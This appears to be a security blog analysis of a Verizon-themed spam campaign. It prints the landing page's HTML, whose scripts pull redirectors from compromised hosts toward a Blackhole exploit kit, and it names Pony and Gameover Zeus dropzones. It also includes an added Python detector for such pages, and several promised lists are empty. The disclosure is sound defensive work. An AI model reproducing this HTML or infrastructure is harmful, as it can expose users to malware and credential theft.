Your Bill Is Now Available

Another day and another new spam template. This time we picked a Verizon Wireless-themed spam campaign. The sample we studied had the subject line “Your Bill Is Now Available”.

The observed spam sample contained the following malicious links:

These pages all contained the following HTML code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://muttonheadcollective.com/XvLBzokA/js.js"></script>
<script type="text/javascript" src="http://auto-escolas.com/TfFQ7r6J/js.js"></script>
<script type="text/javascript" src="http://rgexcel.com/CPD4MoEs/js.js"></script>
<script type="text/javascript" src="http://turkwebalan.com/oUvuQ0b7/js.js"></script>
<script type="text/javascript" src="http://vita-shop.hu/dSSjc0ag/js.js"></script>
<script type="text/javascript" src="http://wilbrahamweddings.co.uk/qsTCVQXM/js.js"></script>
<script type="text/javascript" src="http://www.bestcar.ee/0AfKWVDW/js.js"></script>
<script type="text/javascript" src="http://www.unimoveis.net/jW57W6aZ/js.js"></script>

During our initial analysis these JavaScript redirectors bounced victims to a Blackhole exploit kit at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.
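As an added example (not code from the original post), a small Python check that a mail or web gateway could run on a fetched landing page to flag this template's hallmark: a "Loading" stub that pulls a script of the shape /<8 alphanumeric chars>/js.js from several unrelated hosts. The host names and path tokens in the sample input are constructed placeholders, not the campaign's.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Path shape of the redirector scripts on this template's landing page:
# http://<compromised host>/<8 alphanumeric chars>/js.js
REDIRECTOR_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")

class ScriptSrcParser(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())

def extract_script_srcs(html):
    parser = ScriptSrcParser()
    parser.feed(html)
    parser.close()
    return parser.srcs

def redirector_hosts(html):
    """Distinct hosts whose script src has the /xxxxxxxx/js.js shape."""
    hosts = set()
    for src in extract_script_srcs(html):
        url = urlparse(src)
        if url.scheme in ("http", "https") and url.netloc and REDIRECTOR_PATH.match(url.path):
            hosts.add(url.netloc.lower())
    return sorted(hosts)

def is_suspected_landing_page(html, min_hosts=3):
    """Flag a stub page that pulls that script shape from several unrelated hosts."""
    return len(redirector_hosts(html)) >= min_hosts

# Constructed sample input: placeholder hosts and tokens, not the campaign's.
SAMPLE_LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="http://compromised-a.example/aB3dE9fG/js.js"></script>
<script type="text/javascript" src="http://compromised-b.example/Hj7kL2mN/js.js"></script>
<script type="text/javascript" src="http://compromised-c.example/pQ4rS8tU/js.js"></script>
</html>"""
BENIGN_PAGE = '<html><script src="https://cdn.example/lib/app.min.js"></script></html>'
```

The threshold of three hosts is a tuning choice; a single compromised host serving js.js is common on legitimate sites, while a stub page fanning out to many is the pattern worth alerting on.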

This kit dropped a Pony downloader with the following properties:

File: info.exe
Size: 118809
MD5: 99FAB94FD824737393F5184685E8EDF2

This Pony downloader hijacked FTP credentials and sent them to the following dropzone: http://176.28.18.135:8080/pony/gate.php. This Pony variant was also configured to send the stolen FTP credentials to the following backup dropzones if the primary at 176.28.18.135 was unavailable:

The Pony downloader then grabbed the same Gameover Zeus variant from any of the following locations:

This Gameover Zeus variant had the following properties:

Size: 306712
MD5: 86A548CADA5636B4A8ED7DE5F654FF96

The Gameover Zeus variant was configured to download its configuration file from the following peers via UDP:

This Zeus variant had a bot ID of NR22 and sent keylogged data to the following dropzone: 84.109.164.131:23440/index.php.
